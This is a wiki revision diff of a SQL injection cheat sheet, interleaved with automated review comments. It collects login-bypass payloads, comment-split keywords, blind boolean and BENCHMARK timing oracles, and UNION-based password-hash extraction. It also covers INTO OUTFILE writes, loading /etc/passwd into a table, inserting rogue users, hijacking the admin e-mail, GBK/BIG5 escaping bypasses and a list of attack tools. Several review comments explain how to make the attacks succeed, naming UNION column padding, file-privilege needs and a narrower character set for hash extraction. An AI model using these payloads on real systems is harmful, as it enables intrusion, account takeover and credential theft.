seguridad:sql_injection [2013/03/18 09:36] – [SQL Injection] lc | seguridad:sql_injection [2023/01/18 14:11] (current) – external editor 127.0.0.1
Línea 1: | Línea 1: | ||
==== SQL Injection ==== | ==== SQL Injection ==== | ||
=== Técnicas === | === Técnicas === | ||
+ | < | ||
* /**/ | * /**/ | ||
* /*--*/ | * /*--*/ | ||
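Review bot: the fence opened at the top of the Técnicas list wraps wiki list items (`* /**/`, `* /*--*/`, `* %0A`), so the leading `* ` bullets will be rendered verbatim as part of the code instead of as a list; either drop the bullets inside the fence and keep one token per line, or leave the list outside the fence the way the Herramientas list at the end of the page does.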
Línea 7: | Línea 8: | ||
* %0A | * %0A | ||
* %0D | * %0D | ||
+ | </ | ||
- | < | + | === Técnicas extraidas |
+ | <code sql> | ||
1 SELECT * FROM login /* foobar */ | 1 SELECT * FROM login /* foobar */ | ||
2 SELECT * FROM login WHERE id = 1 or 1=1 | 2 SELECT * FROM login WHERE id = 1 or 1=1 | ||
3 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE " | 3 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE " | ||
+ | </ | ||
Use inside login form: | Use inside login form: | ||
+ | < | ||
01 1' OR 1=1-- | 01 1' OR 1=1-- | ||
02 1' OR ' | 02 1' OR ' | ||
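Review bot: the third extracted technique, `SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE`, does not match every row the way the `1' OR 1=1--` payloads below it do: AND binds tighter than OR, so it parses as `id = 1 OR (1=1 AND user LIKE …)` and the `user LIKE` filter only applies to the second branch. If the intent is to show an always-true condition combined with a user filter, parenthesise it or drop the `AND user LIKE` clause. Minor: the new heading `Técnicas extraidas` should be spelled `extraídas`.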
Línea 35: | Línea 39: | ||
20 ' or a=a-- | 20 ' or a=a-- | ||
21 " or " | 21 " or " | ||
+ | </ | ||
Variations: | Variations: | ||
+ | <code sql> | ||
01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 | 01 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 | ||
02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE " | 02 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE " | ||
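Review bot: the `WHE/**/RE`, `o/**/r` and `L/**/IKE` variations depend on the database discarding an inline comment from the middle of a keyword, and not every database or version does that (where the comment is treated as whitespace, `WHE/**/RE` becomes two tokens and the query fails). The block should state the DBMS and version these were verified against, otherwise readers will take the split form as equivalent to the plain `WHERE … OR 1=1` above it.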
Línea 48: | Línea 53: | ||
10 SELECT host, | 10 SELECT host, | ||
11 SELECT * FROM login WHERE id = 1 or 1=1 AND select host, | 11 SELECT * FROM login WHERE id = 1 or 1=1 AND select host, | ||
+ | </ | ||
Blind injection vectors collection | Blind injection vectors collection | ||
+ | <code sql> | ||
Operators | Operators | ||
+ | |||
1 SELECT 1 && 1; | 1 SELECT 1 && 1; | ||
2 SELECT 1 || 1; | 2 SELECT 1 || 1; | ||
3 SELECT 1 XOR 0; | 3 SELECT 1 XOR 0; | ||
+ | </ | ||
+ | <code sql> | ||
Evaluate | Evaluate | ||
1 all render TRUE or 1. | 1 all render TRUE or 1. | ||
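Review bot: `Operators` and `Evaluate` are section labels, not SQL, but the new `<code sql>` fences enclose them (together with the blank line added after `Operators`), so they will render as code and confuse the highlighter; move each label to the line above its fence, as `Blind injection vectors collection` already is. The same holds for the `1 all render TRUE or 1.` sentence, which is prose and belongs outside the fence.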
Línea 60: | Línea 68: | ||
3 SELECT 2 >= 2; | 3 SELECT 2 >= 2; | ||
4 SELECT ISNULL(1/ | 4 SELECT ISNULL(1/ | ||
+ | </ | ||
+ | <code sql> | ||
Math | Math | ||
1 SELECT FLOOR(7 + (RAND() * 5)); | 1 SELECT FLOOR(7 + (RAND() * 5)); | ||
2 SELECT ROUND(23.298, | 2 SELECT ROUND(23.298, | ||
+ | </ | ||
+ | <code sql> | ||
Misc | Misc | ||
1 SELECT LENGTH(COMPRESS(REPEAT(' | 1 SELECT LENGTH(COMPRESS(REPEAT(' | ||
2 SELECT MD5(' | 2 SELECT MD5(' | ||
+ | </ | ||
+ | <code sql> | ||
Benchmark | Benchmark | ||
01 SELECT BENCHMARK(10000000, | 01 SELECT BENCHMARK(10000000, | ||
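Review bot: same placement problem as the Operators block: `Math`, `Misc` and `Benchmark` sit inside the `<code sql>` fences. More importantly, unlike the Evaluate list, which says every entry renders TRUE or 1, the Math and Misc expressions (`FLOOR(7 + (RAND() * 5))`, `LENGTH(COMPRESS(REPEAT(`…) never state what they are expected to return, so the reader cannot use them as a true/false oracle; put the expected value (or the comparison they are meant to feed) next to each line.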
Línea 81: | Línea 92: | ||
10 Using the timeout to check if user exists | 10 Using the timeout to check if user exists | ||
11 SELECT IF( user = ' | 11 SELECT IF( user = ' | ||
+ | </ | ||
Beware of of the N rounds, add an extra zero and it could stall or crash your browser! | Beware of of the N rounds, add an extra zero and it could stall or crash your browser! | ||
Gathering info | Gathering info | ||
+ | <code sql> | ||
Table mapping | Table mapping | ||
1 SELECT COUNT(*) FROM tablename | 1 SELECT COUNT(*) FROM tablename | ||
+ | </ | ||
+ | <code sql> | ||
Field mapping | Field mapping | ||
1 SELECT * FROM tablename WHERE user LIKE " | 1 SELECT * FROM tablename WHERE user LIKE " | ||
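Review bot: "Beware of of the N rounds" has a doubled word, and the warning misplaces the effect: a large BENCHMARK() count stalls the database server, which executes the loop and holds the connection for the whole count, while the browser merely waits on the response. Saying that makes two things clear that the current text does not: the delay is what turns `IF( user = '…', BENCHMARK(…), …)` into a usable blind timing oracle, and an extra zero is a denial-of-service risk against the target, not a browser nuisance.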
Línea 92: | Línea 105: | ||
3 SELECT * FROM tablename WHERE user = ' | 3 SELECT * FROM tablename WHERE user = ' | ||
4 SELECT * FROM tablename WHERE user = ' | 4 SELECT * FROM tablename WHERE user = ' | ||
+ | </ | ||
+ | <code sql> | ||
User mapping | User mapping | ||
1 SELECT * FROM tablename WHERE email = ' | 1 SELECT * FROM tablename WHERE email = ' | ||
2 SELECT * FROM tablename WHERE user LIKE " | 2 SELECT * FROM tablename WHERE user LIKE " | ||
3 SELECT * FROM tablename WHERE user = ' | 3 SELECT * FROM tablename WHERE user = ' | ||
+ | </ | ||
+ | <code sql> | ||
Advanced SQL vectors | Advanced SQL vectors | ||
Writing info into files. | Writing info into files. | ||
1 SELECT password FROM tablename WHERE username = ' | 1 SELECT password FROM tablename WHERE username = ' | ||
+ | </ | ||
+ | <code sql> | ||
Writing info into files without single quotes: (example) | Writing info into files without single quotes: (example) | ||
1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39), | 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39), | ||
2 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39), | 2 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39), | ||
3 CHAR( 39)) | 3 CHAR( 39)) | ||
- | |||
Note: You must specify a new file, it may not exists and give the correct pathname. | Note: You must specify a new file, it may not exists and give the correct pathname. | ||
+ | </ | ||
+ | <code sql> | ||
The CHAR() quoteless function. | The CHAR() quoteless function. | ||
1 SELECT * FROM login WHERE user = CONCAT(CHAR(39), | 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39), | ||
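Review bot: the note under the INTO OUTFILE example ("You must specify a new file, it may not exists") should read "the target file must not already exist", and it omits the other preconditions a reader will trip over: the database account needs the FILE privilege and the directory must be writable by the database server process (not the web server), otherwise the `SELECT password … INTO OUTFILE` vector fails without writing anything. Since the quoteless `CONCAT(CHAR(39), …)` form is the one most people will need, add the note to that block too rather than only to the quoted one.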
Línea 114: | Línea 130: | ||
3 | 3 | ||
4 SELECT * FROM login WHERE user = CHAR(39, | 4 SELECT * FROM login WHERE user = CHAR(39, | ||
+ | </ | ||
+ | <code sql> | ||
Extracting hashes | Extracting hashes | ||
1 SELECT user FROM login WHERE user = ' | 1 SELECT user FROM login WHERE user = ' | ||
2 UNION SELECT IF(SUBSTRING(pass, | 2 UNION SELECT IF(SUBSTRING(pass, | ||
+ | </ | ||
This evaluates the first char of the password hash from user ' | This evaluates the first char of the password hash from user ' | ||
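Review bot: the hash-extraction vector `SELECT user FROM login WHERE user = '…' UNION SELECT IF(SUBSTRING(pass, …` only runs because the UNION branch returns exactly one column, matching the single `user` column selected on the left; state that constraint beside the example, because against an application query that selects several columns the `UNION SELECT` must be padded to the same column count (and compatible types) before the `IF(SUBSTRING(...))` oracle can be used at all. The sentence "This evaluates the first char of the password hash" should also say which index `SUBSTRING(pass, …` starts at, since that is the loop variable a reader will increment.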
Línea 124: | Línea 141: | ||
The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. | The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. | ||
+ | <code sql> | ||
01 SELECT user FROM login WHERE user = ' | 01 SELECT user FROM login WHERE user = ' | ||
02 UNION SELECT IF(SUBSTRING(pass, | 02 UNION SELECT IF(SUBSTRING(pass, | ||
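Review bot: "see beneath it a quoteless example" reads awkwardly; "a quoteless example follows below" is clearer. Also, the `01`, `02`, … prefixes inside the `<code sql>` fences are line numbers, not SQL, and will be highlighted as numeric literals; drop them from the fenced content (they are not referenced anywhere in the text) or use the highlighter's own numbering.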
Línea 135: | Línea 153: | ||
10 is like: (password, | 10 is like: (password, | ||
11 is like: (password, | 11 is like: (password, | ||
+ | </ | ||
A quoteless example: | A quoteless example: | ||
+ | <code sql> | ||
1 SELECT user FROM login WHERE user = CONCAT(CHAR(39), | 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39), | ||
2 UNION SELECT IF(SUBSTRING(pass, | 2 UNION SELECT IF(SUBSTRING(pass, | ||
+ | </ | ||
Possible chars | Possible chars | ||
0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122 | 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122 | ||
Misc. | Misc. | ||
Insert a new user into DB | Insert a new user into DB | ||
+ | <code sql> | ||
1 INSERT INTO login SET user = ' | 1 INSERT INTO login SET user = ' | ||
+ | </ | ||
Retrieve /etc/passwd file, put it into a field and insert a new user. | Retrieve /etc/passwd file, put it into a field and insert a new user. | ||
- | 1 load data infile "/ | + | < |
Then login! | Then login! | ||
Write the DB user away into tmp | Write the DB user away into tmp | ||
- | 1 SELECT host, | + | <code sql>1 SELECT host, |
Change admin e-mail, for " | Change admin e-mail, for " | ||
- | 1 UPDATE users set email = ' | + | < |
Bypassing PHP functions | Bypassing PHP functions | ||
Bypassing addslashes() with GBK HEX encoding. | Bypassing addslashes() with GBK HEX encoding. | ||
- | 1 WHERE x = 0xbf27 admin 0xbf27 | + | < |
Using an HEX encoded query to bypass escaping. | Using an HEX encoded query to bypass escaping. | ||
+ | <code sql> | ||
1 Normal: SELECT * FROM login WHERE user = ' | 1 Normal: SELECT * FROM login WHERE user = ' | ||
2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 | 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 | ||
+ | </ | ||
Inserting a new user in SQL. | Inserting a new user in SQL. | ||
+ | < | ||
1 Normal: insert into login set user = ' | 1 Normal: insert into login set user = ' | ||
2 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74 | 2 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74 | ||
+ | </ | ||
How to determin the HEX value for injection. | How to determin the HEX value for injection. | ||
- | 1 SELECT HEX(' | + | <code sql>1 SELECT HEX(' |
With comments. | With comments. | ||
+ | < | ||
1 S/ | 1 S/ | ||
2 W/ | 2 W/ | ||
+ | </ | ||
Bypassing mysql_real_escape_string() with BIG5 or GBK | Bypassing mysql_real_escape_string() with BIG5 or GBK | ||
- | 1 " | + | < |
(MySQL 4.1.x before 4.1.20 and 5.0.x) | (MySQL 4.1.x before 4.1.20 and 5.0.x) | ||
- | === Herramientas === | + | ==== Herramientas |
- | Havij -> http:// | + | |
+ | * Havij http:// | ||
+ | * PonyMagic http:// | ||
+ | * General Injection Explorer | ||
+ | * Safe 3 sql injector http:// | ||
+ | * Enema http:// | ||
+ | * Absinthe http:// | ||
+ | * Pangolin http:// | ||
+ | * sql poison | ||
+ | * sql map gui | ||
+ | * bsql hacker http:// | ||
+ | * | ||
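Review bot: the `Possible chars` range (0 to 9, ASCII 48 to 57, and a to z, ASCII 97 to 122) is wider than the hash-extraction loop above needs if the stored value is a hex digest such as the MD5 shown in the Misc block: hex digits are only 0 to 9 and a to f (ASCII 48 to 57 and 97 to 102), which roughly halves the per-character search, so state which hash format the range assumes. On the encoding bypasses: the `0xbf27` trick against addslashes() and mysql_real_escape_string() only works when the connection character set is a multibyte one such as GBK or BIG5, as the headings say; it is worth adding that setting the connection charset correctly on the client side or using prepared statements closes it, otherwise the version note "(MySQL 4.1.x before 4.1.20 and 5.0.x)" reads as the only condition. Smaller points: `determin` should be `determine`; the Herramientas list ends with an empty `*` bullet and lists "sql map gui" but not sqlmap itself; "Safe 3 sql injector", "sql poison" and "General Injection Explorer" have no URL while the other entries do.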
Línea 189: | Línea 223: | ||
==== Referencias ==== | ==== Referencias ==== | ||
* http:// | * http:// | ||
+ | * http:// |